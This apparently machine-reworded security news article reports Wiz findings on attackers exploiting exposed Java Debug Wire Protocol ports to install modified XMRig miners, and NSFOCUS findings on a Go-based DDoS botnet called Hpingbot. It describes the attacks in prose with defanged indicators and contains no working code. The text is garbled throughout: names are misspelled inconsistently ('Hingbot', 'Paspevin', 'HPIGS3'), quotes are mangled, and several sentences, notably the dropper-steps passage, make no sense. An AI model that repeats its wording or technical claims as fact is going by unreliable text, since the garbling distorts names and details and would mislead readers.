Threat actors weaponize exposed Java Debug Wire Protocol (JDWP) interfaces to obtain code execution capabilities and deploy cryptocurrency miners to compromised hosts.
“Attackers can use modified versions of XMRIG in hard “coded configurations to avoid suspicious command line arguments that are often flagged by defenders,” Wiz researchers Yaara Shriki and Gili Tikochinski said in a report published this week.
The Cloud Security company, acquired by Google Cloud, said it has observed activity against honeypot servers running TeamCity, as well as honeypot servers running popular continuous integration and continuous delivery (CI/CD) tools.
JDWP is a communications protocol used in Java for debugging purposes. JDWP allows users to leverage the debugger to work on the same computer or on a remote computer, on a different process, Java application, or remote computer.
However, given that JDWP does not have an authentication or access control mechanism, exposing services to the Internet opens up new attack vectors that attackers can exploit as entry points, giving them full control over the running Java processes.
Simply put, misconceptions can be used to inject and run any command to set persistence and ultimately execute a malicious payload.
“In most Java applications, JDWP is not enabled by default, but is commonly used in development and debugging environments,” says Wiz. “Many popular applications automatically start a JDWP server when running in debug mode. In many cases, if you are inappropriately exposed to remote code execution (RCE) vulnerabilities, without revealing the risk to the developer.”
Some of the applications that may start a JDWP server in debug mode include TeamCity, Jenkins, Selenium Grid, Elasticsearch, Quarkus, Spring Boot, and Apache Tomcat.
Data from Greynoise shows over 2,600 IP addresses scanning JDWP endpoints within the last 24 hours, of which over 1,500 IP addresses are classified as malicious and 1,100 IP addresses are classified as suspicious. Most of these IP addresses come from China, the US, Germany, Singapore and Hong Kong.
In the attacks observed by Wiz, the threat actors take advantage of the fact that the Java Virtual Machine (JVM) is listening to a debugger connection on port 5005 and is beginning to scan open JDWP ports on the Internet. In the next phase, a JDWP handshake request is sent to check if the interface is active and establish a JDWP session.
Once the service is exposed and confirmed to be interactive, the attacker runs a Curl command and moves to get and run a Dropper shell script that performs a set of actions –
Drop modified version of Xmrig Miner for the proper system architecture from an external server that kills competing miners or any high CPU processes (“awarmcorner”)[.]world “)into” ~/.config/logrotate “establish persistence by configuring a Cron job to ensure that the payload is reduced again and rerun every time a shell login, restart, or scheduled time interval is deleted at the exit and reruns itself
“Open source Xmrig offers the convenience of simple customizations for attackers, which involved removing all the command line analysis logic and hard-code the configuration,” Wiz said. “This adjustment not only simplifies deployment, but also allows the payload to mimic the original logotate process more persuasive.”
A new Hpingbot botnet appears
NSFOCUS will be revealing in detail the new, rapidly evolving Go-based malware named Hingbot, which targets both Windows and Linux systems, and as they can be deployed in botnets that can launch distributed denied (DDOS) attacks using hping3, HPING3 for Crafting freelabailable for crafting.
A notable aspect of malware is that unlike other Trojans that usually derive from known botnet malware families such as Mirai and Gafgyt, Hpingbot is a whole new stock. Since at least June 17, 2025, hundreds of DDOS instructions have been issued, with Germany, the US and Türkiye being their main targets.
“This is a new family of botnets built from the ground up, demonstrating powerful innovation capabilities and efficiency when using existing resources, such as distributing loads through online text storage and shared platform Pastebin, or launching DDOS attacks using the network testing tool HPING3.
Hpingbot primarily utilizes a weak SSH configuration propagated by independent modules that perform password spray attacks to obtain initial access to the system.
The presence of German debug comments in the source code may indicate that the latest version may be under testing. In a nutshell, the attack chain involves using Paspevin as a dead-drop resolver to point to an IP address (“128.0.118[.]18”) It is used to download shell scripts.
This script is used to detect the CPU architecture of the infected host, terminate the already running version of the Trojan horse, and obtain the main payload responsible for initiating a DDOS flood attack via TCP and UDP. Hpingbot is designed to establish persistence and cover traces of infection by clearing the command history.
In an interesting twist, the attacker has been observed providing another GO-based DDOS component using a node controlled by Hpingbot. This calls built-in flood attack functionality based on UDP and TCP protocols using Pastebin and HPIGS3 while relying on the same command and control (C2) Sever.
Another aspect worth mentioning is that while the Windows version cannot launch a DDOS attack using HPING3, the tool is installed using the Linux command “Apt -Y install”, the ability of malware to drop and execute additional payloads suggests that threat actors could turn into a disruptive network of services.
“It is worth noting that the Windows version of Hpingbot cannot directly call HPING3 to launch a DDOS attack, but its activity is frequent, indicating that attackers are more likely to focus not only on launching DDOs, but also on the ability to download and run arbitrary payloads.”
Source link
